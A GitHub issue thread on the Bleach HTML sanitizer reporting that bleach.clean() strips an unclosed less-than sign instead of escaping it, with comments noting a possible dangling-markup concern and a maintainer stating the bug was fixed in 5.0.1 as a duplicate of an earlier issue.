-
Notifications
You must be signed in to change notification settings - Fork 246
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
bug: Bleach should escape unclosed less than sign and render it instead of treating it as unclosed html. #590
Comments
Huh, yeah
Bleach should escape it to avoid dangling markup attacks https://portswigger.net/web-security/cross-site-scripting/dangling-markup |
Have a similar use case where bleach escape greater than or less than sign for the value comparison. example: 10 > 5 Since it is a comparison Html escape shouldn't happen. How to handle such use cases in bleach.clean() |
I also have this problem, when my string contains e.g. "Related to all items <G1" However, this does not happen for
|
This was fixed in 5.0.1 and is a dupe of issue #544. |
bleach.clean(text) thinks less than sign without a closing greater than sign is html and clears it from output.
"a < b" -> "a < b"
"a<b" -> "a"
Bleach should escape unclosed less than sign and render as "a<b" or offer an option to do so.
The text was updated successfully, but these errors were encountered: